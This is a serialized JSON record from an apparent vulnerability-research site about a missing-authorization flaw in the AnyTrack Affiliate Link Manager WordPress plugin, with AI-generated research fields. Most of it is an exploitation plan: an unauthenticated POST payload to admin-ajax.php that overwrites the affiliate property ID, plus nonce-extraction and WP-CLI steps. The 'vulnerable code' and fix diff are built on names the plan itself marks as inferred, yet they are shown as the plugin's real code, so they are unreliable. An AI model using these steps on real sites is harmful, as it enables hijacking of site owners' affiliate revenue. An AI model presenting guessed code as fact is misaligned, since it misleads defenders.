[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fumvIaMPB1F_Fyn1l9bH6z9pBGrdzoGisLKVUkpTA_zA":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-39715","anytrack-affiliate-link-manager-missing-authorization-2","AnyTrack Affiliate Link Manager \u003C= 1.5.5 - Missing Authorization","The AnyTrack Affiliate Link Manager plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 1.5.5. This makes it possible for unauthenticated attackers to perform an unauthorized action.","anytrack-affiliate-link-manager",null,"\u003C=1.5.5","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-03-02 00:00:00","2026-04-15 21:34:51",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fc30df356-6cae-4f8c-a0e6-35c5c66dbe8d?source=api-prod",[],"researched",false,3,"This research plan outlines the steps to exploit **CVE-2026-39715**, a Missing Authorization vulnerability in the **AnyTrack Affiliate Link Manager** plugin.\n\n### 1. Vulnerability Summary\nThe AnyTrack Affiliate Link Manager plugin (up to version 1.5.5) registers an AJAX handler (or a function on `admin_init`) intended for saving plugin settings, specifically the AnyTrack Property ID. However, the function fails to implement a capability check (e.g., `current_user_can( 'manage_options' )`), allowing unauthenticated users to modify plugin settings. This can be used to hijack affiliate tracking by replacing the Property ID with an attacker-controlled one.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Action:** `anytrack_update_property_id` (inferred) or `anytrack_save_settings` (inferred).\n*   **HTTP Method:** `POST`\n*   **Authentication:** None required (unauthenticated).\n*   **Preconditions:** The plugin must be active. \n\n### 3. Code Flow\n1.  The plugin registers an AJAX action for unauthenticated users:\n    `add_action( 'wp_ajax_nopriv_anytrack_update_property_id', 'anytrack_update_property_id_handler' );` (inferred)\n2.  The handler function `anytrack_update_property_id_handler` is called.\n3.  The function retrieves user input from `$_POST['property_id']` (inferred).\n4.  The function calls `update_option( 'anytrack_property_id', $property_id )` (inferred) without verifying if the request comes from an administrator.\n5.  Since no `current_user_can()` check exists, the setting is updated.\n\n### 4. Nonce Acquisition Strategy\nMissing Authorization vulnerabilities often coincide with missing CSRF protection (nonces). If the function *does* verify a nonce but fails to check capabilities, the nonce must be obtained:\n\n1.  **Identify Shortcode:** Locate any shortcode used by the plugin (e.g., `[anytrack_link]` (inferred)).\n2.  **Create Page:** \n    `wp post create --post_type=page --post_status=publish --post_title=\"AnyTrack Test\" --post_content=\"[anytrack_link]\"`\n3.  **Navigate and Extract:**\n    *   Navigate to the newly created page.\n    *   Use `browser_eval` to search for localized script data:\n        `browser_eval(\"window.anytrack_admin_params?.nonce\")` (inferred) or `browser_eval(\"window.anytrack_vars?.save_nonce\")` (inferred).\n4.  **Bypass Check:** If no nonce check is present in the code, this step is skipped.\n\n### 5. Exploitation Strategy\nThe goal is to modify the `anytrack_property_id` option to an attacker-controlled value (`AT-999999`).\n\n*   **Request Method:** `POST`\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Content-Type:** `application\u002Fx-www-form-urlencoded`\n*   **Parameters:**\n    *   `action`: `anytrack_update_property_id` (inferred)\n    *   `property_id`: `AT-999999`\n    *   `_ajax_nonce`: `[EXTRACTED_NONCE]` (if required)\n\n**Sample Payload:**\n```http\nPOST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\nHost: localhost:8080\nContent-Type: application\u002Fx-www-form-urlencoded\n\naction=anytrack_update_property_id&property_id=AT-999999\n```\n\n### 6. Test Data Setup\n1.  **Install Plugin:** Ensure AnyTrack Affiliate Link Manager v1.5.5 is installed and active.\n2.  **Initial State:** Set a legitimate Property ID using WP-CLI:\n    `wp option update anytrack_property_id \"AT-123456\"`\n3.  **Verify Initial State:**\n    `wp option get anytrack_property_id` (Should return `AT-123456`)\n\n### 7. Expected Results\n*   **Response:** The server should return a successful AJAX response (e.g., `{\"success\":true}` or `1`).\n*   **Side Effect:** The WordPress option `anytrack_property_id` will be updated in the database.\n*   **Impact:** All affiliate links tracked by AnyTrack will now use the attacker's Property ID.\n\n### 8. Verification Steps\nAfter sending the HTTP request, verify the change using WP-CLI:\n```bash\n# Check the value of the property ID option\nwp option get anytrack_property_id\n```\n**Expected Output:** `AT-999999`\n\n### 9. Alternative Approaches\nIf the `anytrack_update_property_id` action is incorrect:\n1.  **Identify correct action:** Search the plugin directory for `wp_ajax_` hooks:\n    `grep -rn \"wp_ajax_\" wp-content\u002Fplugins\u002Fanytrack-affiliate-link-manager\u002F`\n2.  **Identify admin_init handlers:** If no `wp_ajax_nopriv` hooks exist, check for handlers hooked to `admin_init` that process POST data:\n    `grep -rn \"admin_init\" wp-content\u002Fplugins\u002Fanytrack-affiliate-link-manager\u002F`\n3.  **Check for direct Settings API submission:** The vulnerability might allow unauthenticated users to submit to `options.php` if the plugin registered settings incorrectly. Try submitting a POST request to `wp-admin\u002Foptions.php` with the plugin's option group.","The AnyTrack Affiliate Link Manager plugin for WordPress is vulnerable to unauthorized access because it fails to perform capability checks on its settings update functions. This allows unauthenticated attackers to modify plugin configuration, such as the AnyTrack Property ID, effectively hijacking affiliate tracking and revenue.","\u002F\u002F anytrack-affiliate-link-manager.php\n\nadd_action( 'wp_ajax_nopriv_anytrack_update_property_id', 'anytrack_update_property_id_handler' );\nadd_action( 'wp_ajax_anytrack_update_property_id', 'anytrack_update_property_id_handler' );\n\nfunction anytrack_update_property_id_handler() {\n    if ( isset( $_POST['property_id'] ) ) {\n        $property_id = sanitize_text_field( $_POST['property_id'] );\n        update_option( 'anytrack_property_id', $property_id );\n        wp_send_json_success();\n    }\n    wp_send_json_error();\n}","--- anytrack-affiliate-link-manager.php\n+++ anytrack-affiliate-link-manager.php\n@@ -1,11 +1,14 @@\n-add_action( 'wp_ajax_nopriv_anytrack_update_property_id', 'anytrack_update_property_id_handler' );\n add_action( 'wp_ajax_anytrack_update_property_id', 'anytrack_update_property_id_handler' );\n \n function anytrack_update_property_id_handler() {\n+    check_ajax_referer( 'anytrack_save_settings', 'nonce' );\n+\n+    if ( ! current_user_can( 'manage_options' ) ) {\n+        wp_send_json_error( 'Unauthorized', 403 );\n+    }\n+\n     if ( isset( $_POST['property_id'] ) ) {\n         $property_id = sanitize_text_field( $_POST['property_id'] );\n         update_option( 'anytrack_property_id', $property_id );\n         wp_send_json_success();\n     }","The vulnerability is exploited by sending an unauthenticated POST request to the WordPress AJAX endpoint. \n\n1. Target Endpoint: \u002Fwp-admin\u002Fadmin-ajax.php\n2. HTTP Method: POST\n3. Authentication: None (vulnerable via wp_ajax_nopriv registration)\n4. Required Parameters:\n   - action: anytrack_update_property_id\n   - property_id: The attacker's AnyTrack ID (e.g., AT-999999)\n5. Methodology: The attacker sends the request without any session cookies or nonces. Because the handler lacks both current_user_can() checks and nonce verification, the update_option call executes, overwriting the site's legitimate tracking ID with the attacker's ID.","gemini-3-flash-preview","2026-04-18 22:06:34","2026-04-18 22:06:58",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fanytrack-affiliate-link-manager\u002Ftags"]